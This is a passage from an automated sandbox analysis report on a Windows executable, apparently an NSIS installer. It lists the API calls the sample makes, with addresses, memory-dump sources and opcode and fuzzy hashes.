                                        • Instruction Fuzzy Hash: 9C2193B6704312ABCB10EBA4DD89A5A77B9DB44314720443BF606B32D1D77CE8118B5E
                                        APIs
                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                        • SendMessageA.USER32(?,00000402,00000000), ref: 004013F4
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 3be8b2c82b9d5296ba031bde5fc3ac6967fc1ef6e00b1cb2986e69e81292ed92
                                        • Instruction ID: 2eeecbca978bd34a3a2c87f0a48c5f542c226d41099ae67583a71d3d142e8862
                                        • Opcode Fuzzy Hash: 3be8b2c82b9d5296ba031bde5fc3ac6967fc1ef6e00b1cb2986e69e81292ed92
                                        • Instruction Fuzzy Hash: 80012831724210ABE7294B389D04B6A369CE710328F11823BF811F72F1D6B8DC42DB4D
                                        APIs
                                        • GetModuleHandleA.KERNEL32(?,?,?,0040322E,0000000A), ref: 004062D9
                                        • GetProcAddress.KERNEL32(00000000,?), ref: 004062F4
                                          • Part of subcall function 00406259: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00406270
                                          • Part of subcall function 00406259: wsprintfA.USER32 ref: 004062A9
                                          • Part of subcall function 00406259: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 004062BD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                        • String ID:
                                        • API String ID: 2547128583-0
                                        • Opcode ID: a3d13027c8eccd2d0cc6aa0f1dea92ffe2580633c4132c5b9e113a6e73deba4a
                                        • Instruction ID: 3d2559cad02f3f2c9522d4b64a0f21e72dff4147d54ae6b068db265a7fe850db
                                        • Opcode Fuzzy Hash: a3d13027c8eccd2d0cc6aa0f1dea92ffe2580633c4132c5b9e113a6e73deba4a
                                        • Instruction Fuzzy Hash: 10E08C32A08111ABD3217B749D0493B77A89F8470030208BEF90AF2190D738EC61A6AD
                                        APIs
                                        • GetFileAttributesA.KERNELBASE(00000003,00402D88,C:\Users\user\Desktop\beNxougDFV.exe,80000000,00000003), ref: 00405ACC
                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405AEE
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: File$AttributesCreate
                                        • String ID:
                                        • API String ID: 415043291-0
                                        • Opcode ID: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
                                        • Instruction ID: 2f873e3f3c43f12a3908621a4267836d753c9203ad123c8b10a06e7f93ada197
                                        • Opcode Fuzzy Hash: 3bf94be8ffed2da7c2b8ff60cd5efa52f63dfdc5f5010c3a9122643b4e997265
                                        • Instruction Fuzzy Hash: C7D09E31658201EFEF098F20DD16F2EBBA2EB84B00F10962CB642944E0D6715815AB16
                                        APIs
                                        • GetFileAttributesA.KERNELBASE(?,?,004056BB,?,?,00000000,0040589E,?,?,?,?), ref: 00405AA8
                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405ABC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 7ab00c422df54d36d0d1c47ad5130eeae7fd73d224c9059dc67d6d60f2aac68c
                                        • Instruction ID: bcda01e7c8f131fa4aeedd5c016714751ae51b75e9bd1bf7c5bedf72497e11f2
                                        • Opcode Fuzzy Hash: 7ab00c422df54d36d0d1c47ad5130eeae7fd73d224c9059dc67d6d60f2aac68c
                                        • Instruction Fuzzy Hash: 23D01276A18125AFC3102728ED0C89BBF65DB54371705CB31FCB9A26F0E7304C529AA5
                                        APIs
                                        • CreateDirectoryA.KERNELBASE(?,00000000,004031AE,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004033CF,?,00000006,00000008,0000000A), ref: 0040559F
                                        • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 004055AD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: CreateDirectoryErrorLast
                                        • String ID:
                                        • API String ID: 1375471231-0
                                        • Opcode ID: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
                                        • Instruction ID: 609e72d12c2576d63fea847a2789036c648b4b30b0b2df40a2479a0d359059ce
                                        • Opcode Fuzzy Hash: 6853200a5fdab59dd982fbc96a9ce2e8b021ac935e945b0af5f1b11de4538164
                                        • Instruction Fuzzy Hash: 80C04C70609502EAEA515B319E08B177A66AB50741F1189356106F41F4D6349551D93F
                                        APIs
                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403170,00000000,00000000,00402FCD,000000FF,00000004,00000000,00000000,00000000), ref: 00405B54
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: FileRead
                                        • String ID:
                                        • API String ID: 2738559852-0
                                        • Opcode ID: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
                                        • Instruction ID: 4179e0c76098f610a2fd9102cb0c328980851925f4446f1dd22fc868df860445
                                        • Opcode Fuzzy Hash: 1302354f14da4ac18fdfad316f10263800e98e90a47707ba9ec6b51f8bbd6d6c
                                        • Instruction Fuzzy Hash: 8CE0EC32A1425EABDF109E659C00EEB7BBCEB05760F048432FD15E3150D235F921DBA9
                                        APIs
                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,00000020,?,0040313E,00000000,0040A8C0,00000020,0040A8C0,00000020,000000FF,00000004,00000000), ref: 00405B83
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: FileWrite
                                        • String ID:
                                        • API String ID: 3934441357-0
                                        • Opcode ID: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
                                        • Instruction ID: af6d97e9b78343fe008ce3e7999d984a763d513ea29e4df05d500f045cbeb3ca
                                        • Opcode Fuzzy Hash: c136fe23a15198738cdde8d9ae5bd390bad499becbb6fab094427491a2b8e812
                                        • Instruction Fuzzy Hash: B2E0EC3262425AABDF509E559C00AEB7BACEB05360F008436FD15E2151D635F8219FA5
                                        APIs
                                        • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,00405E43,?,?,?,?,00000002,: Completed), ref: 00405DD9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: Open
                                        • String ID:
                                        • API String ID: 71445658-0
                                        • Opcode ID: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
                                        • Instruction ID: 1bb1e450acb1cec7aaebab1a7e88d6b79e3e17733f6ed9cfc6e3f6d6de5b0954
                                        • Opcode Fuzzy Hash: 688c0e3dac6200a4dcf5f70578aed2939ff3afbafb421f65443b8838c7a2b092
                                        • Instruction Fuzzy Hash: D9D0123214024EBBDF115F909C05FAB3B2DEF04314F108827FE06A4090D375D530AB65
                                        APIs
                                        • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: AttributesFile
                                        • String ID:
                                        • API String ID: 3188754299-0
                                        • Opcode ID: 9ad3368f28842b63240b43095d0b068e3f646c1f23794f7f91dbfbeff94efc4c
                                        • Instruction ID: e41715f0e6a8bf2c44c365c92f64d23a332030a9f95fc047605520203e95b8fc
                                        • Opcode Fuzzy Hash: 9ad3368f28842b63240b43095d0b068e3f646c1f23794f7f91dbfbeff94efc4c
                                        • Instruction Fuzzy Hash: 9BD012B6708111ABCB10DFA8AA4869D77A49B40325B308137D515F21D0E2B9C9456719
                                        APIs
                                        • SendMessageA.USER32(00010460,00000000,00000000,00000000), ref: 0040404E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                        • Instruction ID: a420b78244073386fdaf02eaad45271dfd1dc05eac8f2b2552ccdd106ab2ed6e
                                        • Opcode Fuzzy Hash: 875450fc840247aea6e73403ee44149e02d5474b467ece0a28835bfda1230da9
                                        • Instruction Fuzzy Hash: 70C09B717443007BFA31DB509D49F077758A750B00F5584357320F50D0C6B4E451D62D
                                        APIs
                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402F0F,?), ref: 00403181
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: FilePointer
                                        • String ID:
                                        • API String ID: 973152223-0
                                        • Opcode ID: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                        • Instruction ID: 49fdcfdf8b1973cd13611e97ba0bfafd8618b6cb304eeeee9131019f9f046fb0
                                        • Opcode Fuzzy Hash: 0070af3e33726fe8c9f5218e9eb5d27e4edbe1e9193197dd8736a9b9f47decae
                                        • Instruction Fuzzy Hash: 03B01271644200BFDA214F00DF05F057B21A790700F10C030B748380F082712420EB4D
                                        APIs
                                        • ShellExecuteExA.SHELL32(?,00404415,?), ref: 00405620
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: ExecuteShell
                                        • String ID:
                                        • API String ID: 587946157-0
                                        • Opcode ID: 2982c174e10af5d4c40be735a028cd5bbc0670b812c5b1d1bedef84de471004d
                                        • Instruction ID: 740202cceb9cd72bfbe3504c5fe3e084c22a481b72cb9b9ac8673d70f1f22f9b
                                        • Opcode Fuzzy Hash: 2982c174e10af5d4c40be735a028cd5bbc0670b812c5b1d1bedef84de471004d
                                        • Instruction Fuzzy Hash: 45C092B2404200DFE301CF90CB58F077BE8AB55306F028054E1849A2A0C378A800CB7A
                                        APIs
                                        • SendMessageA.USER32(00000028,?,00000001,00403E55), ref: 00404033
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: MessageSend
                                        • String ID:
                                        • API String ID: 3850602802-0
                                        • Opcode ID: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                        • Instruction ID: 7b5ccc39adf6f72de5191684d4495c6b43ffe58f78915606d69c4a7e6f44d702
                                        • Opcode Fuzzy Hash: 3bdb3c033a7d800f3f5983e71921b41162ac414239058931643885a1338ef954
                                        • Instruction Fuzzy Hash: F3B092B5684200BAEE224B40DD09F457EA2E7A4702F008024B300240B0C6B200A1DB19
                                        APIs
                                        • KiUserCallbackDispatcher.NTDLL(?,00403DEE), ref: 0040401C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: CallbackDispatcherUser
                                        • String ID:
                                        • API String ID: 2492992576-0
                                        • Opcode ID: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
                                        • Instruction ID: 627edf876ec6fe827e8ded8b6e0f84c3e1bff33d3b07c91bc4a796ca35ff40dd
                                        • Opcode Fuzzy Hash: 12c11760972377b051275edfb0549e2da63da5a0a3d5c66f9a0e944dd115ee42
                                        • Instruction Fuzzy Hash: CAA00176808101ABCB029B50FF09D9ABF62ABA5705B028435E65694174C7325865FF1A
                                        APIs
                                          • Part of subcall function 00405056: lstrlenA.KERNEL32(Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000,?), ref: 0040508F
                                          • Part of subcall function 00405056: lstrlenA.KERNEL32(004030B1,Completed,00000000,0040E8C0,00000000,?,?,?,?,?,?,?,?,?,004030B1,00000000), ref: 0040509F
                                          • Part of subcall function 00405056: lstrcatA.KERNEL32(Completed,004030B1,004030B1,Completed,00000000,0040E8C0,00000000), ref: 004050B2
                                          • Part of subcall function 00405056: SetWindowTextA.USER32(Completed,Completed), ref: 004050C4
                                          • Part of subcall function 00405056: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004050EA
                                          • Part of subcall function 00405056: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405104
                                          • Part of subcall function 00405056: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405112
                                          • Part of subcall function 004055CE: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004055F7
                                          • Part of subcall function 004055CE: CloseHandle.KERNEL32(?), ref: 00405604
                                        • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401F20
                                          • Part of subcall function 0040633C: WaitForSingleObject.KERNEL32(?,00000064), ref: 0040634D
                                          • Part of subcall function 0040633C: GetExitCodeProcess.KERNEL32(?,?), ref: 0040636F
                                          • Part of subcall function 00405E8D: wsprintfA.USER32 ref: 00405E9A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1390012497.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                        • Associated: 00000000.00000002.1389993034.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390064349.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390083947.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1390185529.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_400000_beNxougDFV.jbxd
                                        Similarity
                                        • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                        • String ID:
                                        • API String ID: 2972824698-0
                                        • Opcode ID: b0a501a9eafe77c97c2c496f47c0dc6ba7aad14b3677605ff562daff4fba8fe6
                                        • Instruction ID: 17f7953f0d5b7b21d2e535c202f5bbb1bf051249d0315c8d96c64ca666d5043c
                                        • Opcode Fuzzy Hash: b0a501a9eafe77c97c2c496f47c0dc6ba7aad14b3677605ff562daff4fba8fe6
                                        • Instruction Fuzzy Hash: FCF0BB71A05121ABCB20BF654D495EF66A4DF81314B10057BFA01B21D1C77C4E4146BE
                                        APIs
